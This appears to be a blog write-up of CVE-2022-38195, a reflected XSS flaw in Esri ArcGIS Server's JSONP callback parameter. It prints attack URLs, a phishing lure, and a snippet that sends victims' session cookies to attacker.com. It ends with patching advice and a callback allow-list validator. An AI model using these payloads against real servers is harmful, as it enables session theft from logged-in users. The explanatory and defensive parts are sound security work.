Cross-site scripting (XSS) is one of the most common — and dangerous — vulnerabilities that can affect web applications today. In this exclusive long-read, we’ll break down CVE-2022-38195, a reflected XSS vulnerability in Esri ArcGIS Server up to version 10.9.1, including how the bug works, proof-of-concept code, and what users and administrators should do about it.
What Is CVE-2022-38195?
CVE-2022-38195 was disclosed in 2022 and affects Esri ArcGIS Server versions 10.9.1 and prior. Basically, there’s a spot in the product’s web interface that doesn’t properly sanitize user input. An attacker can craft a special (malicious) link and, if the victim clicks it, the link injects JavaScript into the victim’s browser. That JavaScript runs in the context of the ArcGIS web app — possibly stealing session information or taking other malicious actions.
This is a “reflected” XSS vulnerability because the attacker’s input is reflected directly into the page’s output, without being stored on the server.
Why Should You Care About This XSS?
- Remote Attack: The attacker doesn’t need to be local or authenticated. Anyone can exploit this if they can get the victim to click their link.
- Sensitive Data Exposure: If somebody is logged in, their data could be at risk. For example, an attacker might steal session cookies or trick users into performing unwanted actions.
Technical Details
Vulnerable Component: ArcGIS Server’s web manager.
Attack Prerequisite: The victim must click a malicious link.
Bug: Untrusted input from the URL is echoed into HTML output, with no or incorrect sanitization.
Example Vulnerable URL:
Suppose ArcGIS Server runs at http://arcgis.example.com/. The following demonstrates a crafted attack URL:
http://arcgis.example.com/arcgis/rest/services?f=json&callback=<script>alert('XSS')</script>
Here, the callback parameter is reflected unsanitized in the response, allowing script injection.
1. Craft the Malicious Link
http://arcgis.example.com/arcgis/rest/services?f=json&callback=<script>alert(document.cookie)</script>
2. Get the Victim to Click
This could be via phishing: “Hey, check out this new map update!” with the above URL.
Code Snippet: Simple PoC for XSS Extraction
Here's a simple snippet you could use to steal a victim’s session cookie (for educational/testing purposes only!):
<script>
// Attacker's server where cookies will be sent.
// The original snippet had a stray ";" after the string literal, which
// ended the statement before the cookie was appended; the concatenation
// below is what the text describes.
var i = new Image();
i.src = "http://attacker.com/log?cookie=" + document.cookie;
</script>
You would inject this code in place of the callback parameter. For example:
http://arcgis.example.com/arcgis/rest/services?f=json&callback=<script>var i=new Image();i.src='http://attacker.com/log?cookie='+document.cookie;</script>
How to Fix or Mitigate
1. Update to the Latest Version! Esri addressed this in later versions. Apply patches or upgrade as soon as possible.
2. WAF/Filter: If updating is not possible, use a Web Application Firewall to filter out malicious input.
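As an added illustration of the filtering mitigation above (example code, not Esri's code and not an ArcGIS API), here is a strict allow-list for a JSONP callback parameter of the kind reflected in CVE-2022-38195: the callback is accepted only if it is a plain JavaScript member name, and anything else is never echoed back. The function names, the identifier pattern, the length limit and the sample URLs are assumptions.

```javascript
// Added example: allow-listing a JSONP "callback" parameter so that
// attacker-supplied markup is never reflected into the response.
// Function names, pattern and limits are assumptions, not ArcGIS code.

// A legitimate JSONP callback is a member expression such as "cb",
// "handler_1" or "App.handlers.load". Anything else is rejected.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;
const MAX_CALLBACK_LEN = 64;

function isSafeCallback(name) {
  return typeof name === "string" &&
    name.length <= MAX_CALLBACK_LEN &&
    CALLBACK_RE.test(name);
}

// Build the JSONP response. An unsafe callback is not reflected at all:
// the server answers 400 with plain JSON, so the injected string never
// reaches the victim's page.
function buildJsonpResponse(params, payload) {
  const nosniff = { "X-Content-Type-Options": "nosniff" };
  const body = JSON.stringify(payload);
  const callback = params.get("callback");
  if (callback === null) {
    return { status: 200, contentType: "application/json", body, headers: nosniff };
  }
  if (!isSafeCallback(callback)) {
    return { status: 400, contentType: "application/json",
             body: JSON.stringify({ error: "invalid callback name" }),
             headers: nosniff };
  }
  // A script content type plus nosniff keeps the browser from treating
  // the reply as HTML; the leading /**/ is a common JSONP hardening.
  return { status: 200, contentType: "application/javascript",
           body: `/**/ ${callback}(${body});`, headers: nosniff };
}

// Helper: extract the query parameters from a request URL.
function paramsFromUrl(url) {
  return new URL(url).searchParams;
}

// Constructed sample requests: the malicious URL from this write-up and a benign one.
const EVIL_URL = "http://arcgis.example.com/arcgis/rest/services?f=json&callback=<script>alert('XSS')</script>";
const GOOD_URL = "http://arcgis.example.com/arcgis/rest/services?f=json&callback=App.cb_1";
```

Run `buildJsonpResponse(paramsFromUrl(EVIL_URL), { ok: true })` and `buildJsonpResponse(paramsFromUrl(GOOD_URL), { ok: true })` to compare the rejected and accepted cases.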
Conclusion
CVE-2022-38195 shows how even widely used, powerful enterprise products like ArcGIS Server can be tripped up by the age-old problem of cross-site scripting. Always patch quickly, stay aware, and remember: if a link looks odd, don’t click!
Got a vulnerable version or more questions? Make sure to check your deployment and follow the best practices above.
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/27/2022 13:32:00 UTC